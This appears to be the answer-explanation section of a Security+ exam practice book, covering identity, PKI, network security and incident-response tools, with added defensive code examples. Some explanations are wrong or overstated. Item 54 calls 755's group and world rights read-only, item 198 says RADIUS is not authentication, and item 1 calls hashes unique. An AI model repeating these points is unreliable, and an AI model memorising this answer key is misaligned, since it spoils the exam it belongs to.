189. A. The net user command allows this control to be put in place. Although you may not be familiar with the many net user commands, you can take out unrealistic commands or commands with flaws in them. For example, here you could likely guess that -working-hours isn’t a defined term. In the same way, login isn’t a Windows command, but net commands are commonly used to control Windows systems.

190. A. Auditing and reviewing how users actually utilize their account permissions would be the best way to determine if there is any inappropriate use. A classic example would be a bank loan officer. By the nature of their job, they have access to loan documents. But they should not be accessing loan documents for loans they are not servicing. The issue in this case is not permissions, because the users require permission to access the data. The issue is how the users are using their permissions. Usage auditing and permissions auditing are both part of account maintenance, but auditing and review is a better answer. Finally, this is not a policy issue.

191. B. A scenario such as guest Wi-Fi access does not provide the logins with any access to corporate resources. The people logging in merely get to access the Internet. This poses very limited security risk to the corporate network and thus is often done with a common or shared account. Tech support personnel generally have significant access to corporate network resources. Although this is a relatively low access scenario, it is still important to know which specific student is logging on and accessing what resources. Any level of access to corporate resources should have its own individual login account.

192. B. Certificate chains list certificates and certificate authority (CA) certificates, allowing those who receive the certificate to validate that the certificates can be trusted. An invalid, or broken, chain means that the user or system that is checking the certificate chaining should not trust the system and certificate.

193. D. 802.1X is the IEEE standard for port-based network access control. This protocol is frequently used to authenticate devices. Challenge Handshake Authentication Protocol (CHAP) is an authentication protocol but not the best choice for device authentication. Kerberos is an authentication protocol but not the best choice for device authentication. 802.11i is the Wi-Fi security standard and is fully implemented in WPA2 and WPA3. It is not a device authentication procedure.

194. A. WPA2 uses the AES-based CCMP, or Counter Mode Block Chaining Message Authentication (CBC-MAC) Protocol to encapsulate traffic, providing confidentiality. WPA3 also uses CCMP as the minimum acceptable encryption in WPA3-Personal mode. WEP, infrared, and Bluetooth do not use CCMP.

195. A. Simple Network Management Protocol (SNMP) would give an attacker a great deal of information about your network. SNMP should not be exposed to unprotected networks, SNMPv3 should be implemented, and SNMP security best practices should be followed. Both POP3 and IMAP are email access protocols, and Dynamic Host Configuration Protocol (DHCP) is used to hand out dynamic IP addresses.

196. C. Accounts should lock out after a small number of login attempts. Three is a common number of attempts before the account is locked out. This prevents someone from just attempting random guesses. Password aging will force users to change their passwords but won’t affect password guessing. Longer passwords would be harder to guess, but this option is not as effective as account lockout policies. Account usage auditing won’t have any effect on this issue.
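The two account controls discussed in answers 187 (password history) and 196 (account lockout) are simple to implement and worth seeing side by side. The following is an added example written for this page, not code from the book or its author: a minimal account record that stores salted PBKDF2 hashes, refuses a new password that matches the current one or any of the last five, and locks the account after three failed logins (the count the answer calls common). The user name, passwords, history depth, and iteration count are all constructed values chosen for the example.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field

# Policy values assumed for this example (not taken from the question text).
HISTORY_DEPTH = 5        # previous passwords that may not be reused
LOCKOUT_THRESHOLD = 3    # failed attempts before the account locks
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; history entries are hashes, never plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


@dataclass
class Account:
    username: str
    salt: bytes = field(default_factory=lambda: os.urandom(16))  # one salt per account (simplification)
    current: bytes = b""
    history: list = field(default_factory=list)   # oldest first, most recent last
    failed_attempts: int = 0
    locked: bool = False

    def matches_previous(self, password: str) -> bool:
        """True if the candidate equals the current password or any retained old one."""
        candidate = hash_password(password, self.salt)
        return any(hmac.compare_digest(candidate, old)
                   for old in [self.current, *self.history] if old)

    def set_password(self, password: str) -> bool:
        """Enforce password history: reject reuse, otherwise rotate the current hash into history."""
        if self.matches_previous(password):
            return False
        if self.current:
            self.history.append(self.current)
            self.history = self.history[-HISTORY_DEPTH:]   # keep only the last HISTORY_DEPTH
        self.current = hash_password(password, self.salt)
        return True

    def login(self, password: str) -> str:
        """Return 'locked', 'failed', or 'ok'; lock after LOCKOUT_THRESHOLD consecutive failures."""
        if self.locked:
            return "locked"
        if hmac.compare_digest(hash_password(password, self.salt), self.current):
            self.failed_attempts = 0
            return "ok"
        self.failed_attempts += 1
        if self.failed_attempts >= LOCKOUT_THRESHOLD:
            self.locked = True
        return "failed"


def demo() -> dict:
    """Walk one constructed account through both controls and report what happened."""
    acct = Account("gabby")                                  # constructed user
    acct.set_password("Winter2020!")
    reuse_rejected = not acct.set_password("Winter2020!")    # identical to current password
    acct.set_password("Spring2021!")
    old_rejected = not acct.set_password("Winter2020!")      # one generation back, still in history
    attempts = [acct.login("wrong1"), acct.login("wrong2"), acct.login("wrong3")]
    after_lock = acct.login("Spring2021!")                   # correct password, but the account is locked
    return {"reuse_rejected": reuse_rejected, "old_rejected": old_rejected,
            "attempts": attempts, "after_lock": after_lock}


if __name__ == "__main__":
    print(demo())
```

Using one salt per account keeps the history comparison to a single hash of the candidate; production systems usually store a salt per history entry and hash the candidate once per entry. A lockout that never clears (as here) is the strictest form; most directories add an automatic unlock after a cooldown so a burst of bad guesses does not turn into a permanent denial of service against the legitimate user.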


197. A. Security Assertion Markup Language (SAML) is an XML-based, open standard format for exchanging authentication and authorization data between parties. OAuth allows an end user’s account information to be used by third-party services, without exposing the user’s password. RADIUS is a remote access protocol. New Technology LAN Manager (NTLM) is not XML-based.

198. A. Challenge Handshake Authentication Protocol (CHAP) was designed specifically for this purpose. It periodically reauthenticates, thus preventing session hijacking. Neither Password Authentication Protocol (PAP) nor TACACS+ prevents session hijacking, and RADIUS is a protocol for remote access, not authentication.

199. C. IPSec virtual private networks (VPNs) can make a remote location appear as though it is connected to your local network. Since Greg needs to rely on a streaming security camera, an always-on IPSec VPN is the best solution listed. TLS (SSL) VPNs are primarily used for specific applications, typically focusing on web applications.

200. B. The Opal storage specification defines how to protect confidentiality for stored user data and how storage devices from storage device manufacturers can work together. OPAL does not specify details or processes for licenses, accounts, and libraries, or degaussers.

201. B. UEFI Secure Boot checks every binary that is loaded during boot to make sure that its hash is valid, by checking against either a locally trusted certificate or a checksum on an allowlist. It does not protect against worms that might attack those binaries, nor does it directly check the system BIOS version.

202. C. OpenID Connect works with the OAuth 2.0 protocol and supports multiple clients, including web-based and mobile clients. OpenID Connect also supports REST. Shibboleth is a middleware solution for authentication and identity management that uses SAML (Security Assertion Markup Language) and works over the Internet. RADIUS is a remote access protocol. OAuth allows an end user’s account information to be used by third-party services, without exposing the user’s password.

203. D. Anomaly-based detection systems build a behavioral baseline for networks and then assess differences from those baselines. They may use heuristic capabilities on top of those, but the question specifically asks about baselined operations pointing to an anomaly-based system. Heuristic-based detections look for behaviors that are typically malicious, and signature-based or hash-based detections look for known malicious tools or files.

204. B. A Trusted Platform Module, or TPM, is used as the foundation for a hardware root of trust for modern PCs. The TPM may provide a cryptographic key; a PUF, or physically unclonable function; or a serial number that is unique to the device. The CPU and hard drive are not used for this function, and HSMs, or hardware security modules, are used for public key infrastructure (PKI) and cryptographic purposes but not as a hardware root of trust for PCs.

205. C. Next-generation firewalls typically build in advanced capabilities like URL filtering, blacklisting, and other application-layer capabilities beyond simple packet filtering or stateful packet inspection.

206. D. Mobile application management (MAM) tools are specifically designed for this purpose, and they allow applications to be delivered to, removed from, and managed on mobile devices. MOM is the Microsoft Operations Manager, a systems management tool that Microsoft has replaced with Operations Manager in current use. MLM often means multilevel marketing, or pyramid schemes—not a security term. MIM is not a security term.

207. A. Cloud applications have many of the same concerns as on-premises applications, but compromise of the system running the application due to local access is a far less likely scenario. Cloud application vendors are more likely to operate in secure datacenters with limited or no access to the servers except for authorized personnel, greatly reducing the likelihood of this type of security issue.

208. D. The most critical part of a certificate authority (CA) is its root certificate, and ensuring that the root certificate is never exposed is critical to the ongoing operation of that CA. Thus, root CAs are often maintained as offline CAs, making it far harder for an attacker to compromise the system and gain access to the root certificate. In practice, compromised CAs may lose the trust of organizations around the world and be unable to continue to do business.

209. C. Split-tunnel VPNs send only traffic destined for the remote network over the VPN, with all other traffic split away to use the VPN system or a user’s primary network connection. This reduces overall traffic sent through the VPN but means that traffic cannot be monitored and secured via the VPN. Half-pipe is not a security term, and split horizon is most often used to describe DNS where an internal and external DNS view may be different.

210. A. Loop protection looks for exactly this type of issue. Loop protection sends packets that include a PDU, or protocol data unit. These are detected by other network devices and allow the network devices to shut down ports from which they receive those packets. The remaining options were made up for this question.

211. C. Over-the-air (OTA) updates are used by cellular carriers as well as phone manufacturers to provide firmware updates and updated phone configuration data. Mobile device management (MDM) tools can be used to monitor for the current firmware version and phone settings and will allow Charles to determine if the phones that his staff use are updated to ensure security. A network access control (NAC) agent might capture some of this data but only for network-connected phones, which will not cover off-site phones, those with Wi-Fi turned off, or remote devices. OTA is not specifically a way to update encryption keys, although firmware or settings might include them. OTA is not sent by the phones themselves.

212. C. Open source firewalls typically do not have the same level of vendor support and maintenance that commercial firewalls do. That means you don’t have a vendor to turn to if something goes wrong, and you will be reliant on a support community for patches and updates. Open source firewalls are typically less expensive, their open source nature means that the code can be validated by anybody who cares to examine it, and it can be acquired as quickly as it can be downloaded.

213. C. WPA3 personal replaced PSK, or preshared keys, with SAE, or simultaneous authentication of equals. SAE helps to prevent brute-force attacks against keys by making attackers interact with the network before each authentication attempt. This slows down brute-force attacks. WPA3 also includes a 192-bit encryption mode. It does not replace 64-bit encryption with 128-bit encryption, add per-channel security, or add distributed denial-of-service (DDoS) monitoring and prevention.

214. B. Security Enhanced Linux (SELinux) allows mandatory access control for Linux-based systems, and SEAndroid is an Android implementation of SELinux. That means that Isaac can use SEAndroid to accomplish his goals. Android does use a registry, but there is no MAC mode. MACDroid was made up for this question, and single-user mode does not make Android a MAC-based system.

215. B. The system described is a privileged access management (PAM) system. PAM systems are used to manage and control privileged accounts securely. MAC is an access control scheme that enforces access at the OS level. FDE is full-disk encryption, and TLS is Transport Layer Security.

216. A. Using a mobile device management (MDM) tool that allows control of the devices would allow Alaina to lock out the cameras, preventing staff members from using the Android tablets to take pictures. She would still need to ensure that her staff did not bring their own camera-equipped devices into the facility. DLP is data loss prevention, OPAL is an encryption standard for drives, and MMC has a number of meanings, including multimedia cards and Microsoft Management Console snap-ins for Windows systems, none of which would provide the control she needs.

217. C. A universal endpoint management (UEM) tool can manage desktops, laptops, mobile devices, printers, and other devices. UEM tools often use applications deployed to mobile devices to configure and manage them, and Olivia’s best option from this list is a UEM tool. A CASB is a cloud access security broker and is not used to manage mobile devices, and the other options require massive amounts of manual work and are unlikely to succeed—or users will simply change settings when it is convenient to them.

218. C. Next-generation (NG) secure web gateways (SWG) add additional features beyond those found in cloud access security brokers and next-generation firewalls. While features can vary, they may include web filtering, TLS decryption to allow traffic analysis and advanced threat protection, cloud access security broker (CASB) features, data loss prevention (DLP), and other advanced capabilities. This type of solution is a relatively new one, and the market is changing quickly.

219. C. Access policies are built using information and attributes about access requests. If the policy requirements are met, the actions like allowing or denying access, or requiring additional authentication steps can be performed. Geolocation and time-based logins focus on a single information component, and account auditing is used to review permissions for accounts, not to perform this type of validation or policy-based control.

220. B. Numeric representations of file permissions are commonly used instead of using rwx notation with chmod. A 7 sets full permissions, and the first number sets the user’s rights, meaning that here the user will be granted full access to the file.
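The mapping between the three octal digits and the owner/group/other rwx triplets is mechanical, and it is easy to check against a real file. This added example (written for this page, not code from the book) expands a numeric mode into rwx notation the same way chmod interprets it, then applies the mode to a scratch file with Python's os.chmod and reads the bits back, so the arithmetic and the operating system can be compared directly. The modes used are constructed sample values.

```python
import os
import stat
import tempfile

# A chmod mode such as 750 has three digits, in order: owner (user), group, others.
# Each digit is the sum of read (4), write (2), and execute (1); 7 = 4 + 2 + 1 = rwx.


def digit_to_rwx(digit: int) -> str:
    """Expand one octal digit (0-7) into its rwx triplet, e.g. 5 -> 'r-x'."""
    if not 0 <= digit <= 7:
        raise ValueError("permission digit must be 0-7")
    return (("r" if digit & 4 else "-")
            + ("w" if digit & 2 else "-")
            + ("x" if digit & 1 else "-"))


def mode_to_string(mode: str) -> str:
    """Expand a three-digit numeric mode into ls-style notation: '750' -> 'rwxr-x---'."""
    if len(mode) != 3 or not mode.isdigit() or any(d in "89" for d in mode):
        raise ValueError("expected three octal digits such as '755'")
    return "".join(digit_to_rwx(int(d)) for d in mode)


def apply_and_read_back(mode: str) -> str:
    """Apply the numeric mode to a temporary file with os.chmod and read back what the OS stored."""
    fd, path = tempfile.mkstemp()          # scratch file, removed before returning
    try:
        os.close(fd)
        os.chmod(path, int(mode, 8))       # same octal semantics as `chmod 750 file`
        # stat.filemode() yields e.g. '-rwxr-x---'; drop the leading file-type character.
        return stat.filemode(os.stat(path).st_mode)[1:]
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for m in ("700", "755", "640", "600"):
        print(m, mode_to_string(m), apply_and_read_back(m))
```

The first digit is the one the answer refers to: with 7 in the owner position the file owner gets read, write, and execute regardless of what the group and others digits say, which is why a reviewer looking at a mode string can read off the owner's rights from that single digit.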

221. B. Certificate pinning associates a known certificate with a host and then compares that known certificate with the certificate that is presented. This can help prevent man-in-the-middle attacks but can fail if the certificate is updated and the pinned certificate isn’t. A CRL, or certificate revocation list, would show whether the certificate has been revoked, but it would not show if it was changed. Patrick will not have access to the remote server’s private key unless he happens to be the administrator.

222. C. Privacy Enhanced Mail (PEM) is the most common format issued by certificate authorities. Distinguished Encoding Rules (DER) format is a binary form of the ASCII text PEM format. PKCS#7 or P7B format is Base64 ASCII, and PKCS#12, or PFX, format is a binary format used to store server certificates, intermediate certificates, and private keys in a single file.

223. C. Michelle’s only option is to remove the certificate from the list of trusted certificates on every machine that trusted it. This can be time-consuming and error prone, and it’s one reason self-signed certificates are avoided in production at many organizations.

224. D. Changing the IP addresses associated with a domain to an arbitrary value could cause routing or other problems. That means that changing the IP address would not be a chosen method of validating a domain. The remaining options are legitimate and normal means of validation for certificates.

225. A. SNMPv3 adds the ability to authenticate users and groups and then encrypt messages, providing message integrity and confidentiality. It does not have SQL injection prevention built in, but it also isn’t a protocol where SQL injection will typically be a concern.

226. A. This diagram shows a reverse proxy. A reverse proxy takes connections from the outside world and sends them to an internal server. A forward proxy takes internal connections and sends them to external servers. Round-robin and next-generation proxies are not types of proxies, although round-robin is a form of load balancing.


Chapter 4: Operations and Incident Response

1. A. Mila should select a hash because a hash is designed to be unique to each possible input. That means that multiple files could have the same checksum value, whereas a hashing algorithm will be unique for each file that it is run against.
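The point in answer 1 is that a simple checksum can report two different files as identical while a cryptographic hash distinguishes them. This added example (written for this page, not from the book) makes that concrete: a toy additive checksum, constructed here and labelled as such, cannot tell apart two constructed "file" contents that differ only in byte order, while SHA-256 from Python's hashlib does. The sample file contents are constructed for the example.

```python
import hashlib

# Constructed sample "files": the same bytes in a different order. This is the kind of
# change (a swapped digit) an integrity check exists to catch.
ORIGINAL = b"transfer 100 to account 42\n"
TAMPERED = b"transfer 001 to account 42\n"


def byte_sum_checksum(data: bytes) -> int:
    """Toy checksum constructed for this example: the sum of all byte values modulo 2**16.
    Any reordering of the same bytes produces the same value, so it cannot detect this tampering."""
    return sum(data) % 65536


def sha256_hex(data: bytes) -> str:
    """Cryptographic hash of the file content; any change in the bytes changes the digest."""
    return hashlib.sha256(data).hexdigest()


def compare(a: bytes, b: bytes) -> dict:
    """Report whether each integrity method considers the two inputs identical."""
    return {
        "checksum_collides": byte_sum_checksum(a) == byte_sum_checksum(b),
        "hash_collides": sha256_hex(a) == sha256_hex(b),
    }


def verify(expected_digest: str, data: bytes) -> bool:
    """The forensic use of a hash: confirm an acquired copy matches the digest recorded at acquisition."""
    return hashlib.sha256(data).hexdigest() == expected_digest


if __name__ == "__main__":
    print(compare(ORIGINAL, TAMPERED))
    recorded = sha256_hex(ORIGINAL)          # digest recorded when the evidence was acquired
    print(verify(recorded, ORIGINAL), verify(recorded, TAMPERED))
```

In practice this is why evidence acquisition records a SHA-256 (or similar) digest rather than a checksum: the digest recorded at collection time is what a court or a second examiner later compares against, and a checksum collision like the one above would let a modified copy pass as the original.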

2. A. Allowlists are lists of approved software. Software can only be installed if it is on an allowlist. Denylists block specific applications, but they cannot account for every possible malicious application. Access control lists (ACLs) determine who can access a resource. A host intrusion detection system (HIDS) does not prevent software from being installed.

3. C. Correlation dashboards are used to aggregate events and to seek out connections. In some cases, this is done with advanced analytic algorithms, including artificial intelligence (AI) and machine learning (ML). A network intrusion detection system (NIDS) would be helpful but will not (by itself) necessarily correlate events. A public key infrastructure (PKI) handles certificates, not correlation and visibility of security events. Trend dashboards would show how things are going and which way statistics and information are moving.

4. D. Using tcpdump with flags like -i to set the interface, tcp to set the protocol, and port to set the port will capture exactly the traffic Emily needs to capture. Port 443 is the default HTTPS port. There is no -proto flag for tcpdump.

5. A. Tabletop exercises are used to talk through a process. Unlike walk-throughs, which focus on step-by-step review of an incident, Mila will focus more on how her team responds and on learning from those answers. A tabletop exercise can involve gaming out a situation. A simulation actually emulates an event or incident, either on a small or a large scale. Drills are not defined as part of the Security+ exam outline.

6. A. Backups are considered to be the least volatile type of storage since they change at a much slower pace and, in fact, may be intentionally retained for long periods of time without changing. In this list, CPU cache will change the most frequently, then RAM, then local disk contents.

7. C. Incident responders know that scan results can show vulnerable systems and services, providing clues about how attackers may have obtained access to systems. The scans will not show the programs the attackers used but may show services that they have enabled or changed. The scans will show the versions of software installed before the attack, but that information is only useful if the attackers either upgraded or changed the software or the software was vulnerable, making this a less accurate and useful answer. Finally, the scans may show where network security devices are, but that information should be available to the incident response team without trying to figure it out from scans.

8. C. After eradication of the issue has been completed, recovery can begin. Recovery can include restoration of services and a return to normal operations.

9. C. The -p flag adds a persistent route when combined with the ADD command. Persistent routes will remain in the routing table between boots. By default, they are cleared at each boot. An attacker may choose to use this to help with an on-path (man-in-the-middle) attack.

10. D. Of the options provided, only theHarvester is an open source intelligence tool. Curl is a tool used to transfer data, hping is a tool that is frequently used to build custom packets and to perform packet analyzer functions, and netcat is a utility that allows you to read and write to network connections, making it a broadly used tool for pentesters and attackers who need to transfer data using a small, capable utility.

11. C. The MITRE ATT&CK framework focuses on techniques and tactics and does not focus on a specific order of operations like the Cyber Kill Chain does. It also covers a broader range of techniques and adversaries than the Diamond Model does and is broadly implemented in many existing tools. The CVSS standard is a vulnerability scoring system and is not a useful framework for analyzing malware and attacks.

12. D. To properly preserve the system, Ted needs to ensure that it does not change. Turning the system off will cause anything in memory to be lost, which may be needed for the investigation. Removing the drive while a system is running can cause data to be lost. Instead, live imaging the machine and its memory may be required. Allowing users to continue to use a machine will result in changes, which can also damage Ted's ability to perform a forensic investigation.

13. D. Containment efforts are used to limit the spread or impact of an incident. Containment may focus on keeping systems or services online to ensure that organizations can continue to function until other options for business continuity can be implemented. Segmentation moves systems or services into different security zones, and isolation removes them from all contact or puts them in small groups that are removed from the rest of the organization and systems that are not impacted.

14. D. Windows does not log network traffic at a level of granularity that will show if a file has been uploaded. Basic traffic statistics can be captured, but without additional sensors and information gathering capabilities, Jessica will not be able to determine if files are sent from a Windows system.

15. C. The chain of custody in forensic activities tracks who has a device, data, or other forensic artifact at any time, when transfers occur, who performed analysis, and where the item, system, or device goes when the forensic process is done. Evidence logs may be maintained by law enforcement to track evidence that is gathered. Paper trail and digital footprint are not technical terms used for digital forensics.

16. A. Of the listed tools, only nmap is a port scanner, and thus it is the tool that will provide the required information. route is a command-line tool to view and add network traffic routes. hping is a packet generator and analyzer, and netstat is a command-line tool that shows network connections, interface statistics, and other useful information about a system's network usage.

17. B. The -c flag for grep counts the number of occurrences for a given string in a file. The -n flag shows the matched lines and line numbers. Even if you're not sure about which flag is which, the syntax should help on a question like this. When using grep, the pattern comes before the filename, allowing you to rule out two of the options right away.

18. B. Stakeholder management involves working with stakeholders, or those who have an interest in the event or impacted systems or services. COOP, or Continuity of Operations Planning, is a U.S. federal government effort to ensure that federal agencies have continuity plans. PAM is privileged account management. Stakeholder management involves more than just communications, although communications is an important part of it.

19. D. The most common reason for a one-hour time offset between two systems in the same location is a faulty time zone setting creating a time offset between the systems.

20. C. DNS data is frequently logged to help identify compromised systems or systems that have visited known phishing sites. DNS logs can be used along with IP reputation and known bad hostname lists to identify issues like these. DNS data is not commonly used to identify network scans and cannot capture them. Domain transfers are not attacks, although they are information gathering and will show in the logs. DNS does not capture information about logins.

21. D. Even if you're not deeply familiar with the openssl command-line utility, you should know that certificates use ciphers that accept a bit length as a flag and that bit lengths like 1024, 2048, and 4096 are common. These key lengths are not commonly communicated in bytes, and certificates are unlikely to last for multiple decades, although a certificate authority (CA) root certificate can last for a long time.

22. B. By default, the tail command shows the last 10 lines of a file, and using the -f flag follows changes in the file. head shows the top of a file, and foot and follow were made up for this question.

23. B. Although firmware acquisition is a less commonly used technique, firmware is typically stored in a chip on a system board rather than on disk. Henry is most likely to succeed if he retrieves the running firmware from memory. A serial connection may work but would typically require rebooting the system.

24. B. Network flows using NetFlow or sFlow would provide the information that Eric wants, with details of how much traffic was used, when, and where traffic was directed. A firewall or data loss prevention (DLP) would not show the bandwidth detail, although a firewall may show the connection information for events. Packet flow was made up for this question and is not a technology used for this purpose.

25. D. Hashing using MD5 or SHA1 is commonly used to validate that a forensic image matches the original drive. Many forensic duplicators automatically generate a hash of both drives when they complete the imaging process to ensure that there is a documentation chain for the forensic artifacts. A third image may be useful but does not validate this. Directory listings do not prove that drives match, and photos, though useful to document the drives and serial numbers, do not validate the contents of the drives.

26. B. Nessus is a popular vulnerability scanning tool. It is not a fuzzer, web application firewall (WAF), or protocol analyzer.

27. A. Of the options listed, the only requirement for admissibility is that the evidence must be relevant. Evidence must also be authenticated, meaning that it needs to be genuine.

28. D. The cost to the organization is not typically a part of communications planning. Since incidents can have a broad range of costs, and since exposing those costs can cause worry or a loss of customer confidence in the worst case, the costs of the incident are relatively rarely exposed as part of the incident response process. Communications with customers and employees are critical, and having different communication plans for different event severities helps ensure that appropriate communications occur.

29. B. The cat command without an angle bracket to redirect it will simply display the contents of the files listed. Thus, this command will display file1.txt, and then file2.txt. If Rick had inserted > between the two files, it would have appended file1.txt to file2.txt.

30. D. CentOS and Red Hat both store authentication log information in /var/log/secure instead of /var/log/auth.log used by Debian and Ubuntu systems. Knowing the differences between the major distributions can help speed up your forensic and incident investigations, and consistency is one of the reasons that organizations often select a single Linux distribution for their infrastructure whenever it is possible to do so.

31. B. Web page titles, as well as headers like meta tags, are examples of metadata about a page and are frequently used to gather information about web pages and websites. Headers are used as part of a page's design and typically describe the bar at the top of the page used for site navigation. Summary and hidden data are not technical terms used to describe web page components.

32. C. Cuckoo, or Cuckoo Sandbox, is a malware analysis sandbox that will safely run malware and then analyze and report on its behavior. strings is a command-line tool that retrieves strings from binary data. scanless is a tool described as a port scraper, which retrieves port information without running a port scan by using websites and services to run the scan for you. Sn1per is a pentest framework.

33. C. Although Autopsy, strings, and grep can all be used to retrieve information from files, exiftool is the only purpose-built file metadata retrieval tool listed.

34. B. FTK Imager is a free tool that can image both systems and memory, allowing Isaac to capture the information he wants. Although dd is useful for capturing disks, other tools are typically used for memory dumps, and though dd can be used on a Windows system, FTK Imager is a more likely choice. Autopsy is a forensic analysis tool and does not provide its own imaging tools. WinDump is a Windows version of tcpdump, a protocol analyzer.

35. B. When artifacts are acquired as part of an investigation, they should be logged and documented as part of the evidence related to the investigation. Artifacts could include a piece of paper with passwords on it, tools or technology related to an exploit or attack, smart cards, or any other element of an investigation.

36. A. The MX records for a domain list its email servers. Gary can use nslookup to query Domain Name System (DNS) for the MX servers using the command nslookup -query=mx example.com to look up example.com's email server. ping does not support MX server lookups, and both smtp and email are not command-line tools.

37. B. Wireshark can be used to capture and analyze live Session Initiation Protocol (SIP) traffic on a network. Analysts should keep in mind that SIP traffic may be encrypted on their network and that they may need to take additional steps to fully view the content of SIP packets. Log files can provide information about SIP sessions and events and are useful for analysis after the fact, but they won't provide the same detail about live SIP traffic. Nessus is a vulnerability scanner, and SIPper was made up for this question.

38. A. Although all of the tools listed can perform a port scan and identify open ports, netcat is the only one that does not also integrate automated service identification.

39. D. Forensic reports should include appropriate technical detail. Analysis of a system does not include a picture of the person from whom the system was acquired.

40. A. This question tests your knowledge of both the common Linux logs and basic format information for the auth.log file. Greg could use grep to search for "Failed password" in the auth.log file found in /var/log on many Linux systems. There is not a common log file named bruteforce.log; tail and head are not useful for searching through the file, only for showing a set number of lines; and /etc/ is not the normal location for the auth.log file.
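As an added illustration of the grep usage described in answers 17 and 40 (this script is not from the book), the following shell script builds a small constructed auth.log and then counts "Failed password" entries with grep -c, lists them with grep -n, and tallies them per source address so a responder can see where a password-guessing attempt is coming from. The log lines, the host name web01, and the documentation-range IP addresses are constructed sample data, and the function names are my own.

```shell
#!/bin/sh
# Added example: triaging "Failed password" entries in a Debian/Ubuntu-style
# auth.log with grep, as answers 17 and 40 describe. Not code from the book.
# The log lines, host name and IP addresses below are constructed sample data.

# Write a small constructed auth.log to a temporary file and print its path.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Mar  3 10:15:01 web01 sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar  3 10:15:03 web01 sshd[1234]: Failed password for root from 203.0.113.5 port 51236 ssh2
Mar  3 10:15:05 web01 sshd[1240]: Accepted password for alice from 198.51.100.7 port 40000 ssh2
Mar  3 10:15:09 web01 sshd[1241]: Failed password for alice from 198.51.100.7 port 40002 ssh2
Mar  3 10:16:00 web01 CRON[1300]: pam_unix(cron:session): session opened for user root by (uid=0)
EOF
    echo "$f"
}

# grep -c counts matching lines (answer 17); the pattern comes before the file name.
count_failed() {
    grep -c 'Failed password' "$1"
}

# grep -n prints each matching line with its line number, handy when a
# responder needs to cite the exact entries in a report.
show_failed() {
    grep -n 'Failed password' "$1"
}

# Tally failed logins per source address: the address is the word after "from".
# Output is "count address", most frequent first.
failed_by_source() {
    grep 'Failed password' "$1" \
      | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
      | sort | uniq -c | sort -rn
}

# The address with the most failures is the first thing to look at when
# checking for a brute-force attempt against sshd.
top_failed_source() {
    failed_by_source "$1" | head -n 1 | awk '{ print $2 }'
}

log=$(make_sample_log)
echo "failed logins: $(count_failed "$log")"
show_failed "$log"
failed_by_source "$log"
echo "top source: $(top_failed_source "$log")"
rm -f "$log"
```

On a live system the same functions would be pointed at /var/log/auth.log (or /var/log/secure on CentOS and Red Hat, as answer 30 notes); grep -c reports 3 for the sample above and the per-source tally shows two failures from 203.0.113.5 and one from 198.51.100.7.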

41. C. The browser cache, history, and session information will all contain information from recently visited sites. Bookmarks may indicate sites that a user has visited at some point, but a bookmark can be added without visiting a site at all.

42. C. Wireshark is a packet analyzer that can be used to capture and analyze network traffic for forensic purposes. Unlike disk forensics, network forensics require forethought and intentional capture of data before it is needed since traffic is ephemeral. Organizations that want to have a view of network traffic without capturing all traffic might use NetFlow or sFlow to provide some information about network traffic patterns and usage. Nessus is a vulnerability scanner, nmap is a port scanner, and Simple Network Management Protocol (SNMP) is a protocol used to transfer and gather information about network devices and status.

43. A. Mapping networks using ping relies on pinging each host, and then uses time-to-live (TTL) information to determine how many hops exist between known hosts and devices inside a network. When TTLs decrease, another router or switch typically exists between you and the device. Packets sent and received can be used to determine if there are issues with the path or link, and transit time can provide information about relative network distance or the path used, but traceroute provides far more useful detail in that case.

44. C. Organizations define retention policies for different data types and systems. Many organizations use 30-, 45-, 90-, 180-, or 365-day retention policies, with some information required to be kept longer due to law or compliance reasons. Susan's organization may keep logs for as little as 30 days depending on storage limitations and business needs. Data classification policies typically impact how data is secured and handled. Backup policies determine how long backups are retained and rotated and may have an impact on data if the logs are backed up, but backing up logs is a less common practice due to the space they take up versus the value of having logs backed up. Legal hold practices are common, but policies are less typically defined for legal holds since requirements are set by law.

45. C. Zero-wiping a drive can be accomplished using dd, and when this command is completed Selah will have written zeroes to the entire drive /dev/sda.

46. C. Involving impacted areas, or those that have a role in the process, is part of stakeholder management and ensures that those who need to be involved or aware of the incident response process are engaged throughout the process. Laws rarely have specific requirements for internal involvement, instead focusing on customers or those whose data is involved in an incident. Retention policies determine what data is kept and for how long. COOP is Continuity of Operations Planning, a federal effort to ensure disaster recovery and business continuity plans are in place for federal agencies.

47. A. A simulation is the closest you can get to a real-world event without having one. A tabletop exercise has personnel discussing scenarios, whereas a walk-through goes through checklists and procedures. A wargame is not a common exercise type.

48. C. The Content-Addressable Memory (CAM) tables on switches contain a list of all the devices they have talked to and will give Erin the best chance of identifying the devices on the network. Wireshark and netstat will only have a view of the devices that the system she is working from communicates with or that broadcast on the network segment she is on. Domain Name System (DNS) will list only systems that have a DNS entry. In most organizations, relatively few systems will have entries in DNS.

49. C. Sensors are deployed, either as agents, hardware, or virtual machines to gather information to relay it back to a security information and event management (SIEM) device. Alert levels, trend analysis features, and sensitivity thresholds are all used to analyze and report on data, not to gather data.

50. C. A quarantine process or setting will preserve malicious or dangerous files and programs without allowing them to run. This allows defenders to retrieve them for further analysis as well as to return them to use if they are determined not to be malicious, or if the malicious components can be removed from needed files. Purging, deep-freezing, and retention are not terms used to describe this behavior or setting.

51. C. Chuck should recommend a mobile device management (MDM) system to ensure that organizational devices can be managed and protected in the future. Data loss prevention (DLP) will not stop a lost phone from being a potential leak of data, isolating the phones is not a realistic scenario for devices that will actually be used, nor is containment because the phone is out of the organization's control once lost.

52. A. A content filter is specifically designed to allow organizations to select both specific sites and categories of content that should be blocked. Gabby could review content categories and configure the filter to prevent students from browsing to the unwanted sites. A data loss prevention (DLP) solution is designed to prevent data loss, a firewall can block IP addresses or hostnames but would require additional functionality to filter content, and an intrusion detection system (IDS) can detect unwanted traffic but cannot stop it.

53. B. Information stored on a disk drive is one of the least volatile items in the order of volatility, but backups are even less volatile. That means Frank should capture backups after he images the disk drive and that he should capture CPU cache and registers as well as system RAM first if he needs them.

54. C. The -R flag applies the permission recursively to all files in the named directory. Here, the permissions are 7, which sets the owner to read, write, and execute, and 55, which sets group and then world permissions to read only. 755 is a very commonly used permission on Linux systems.

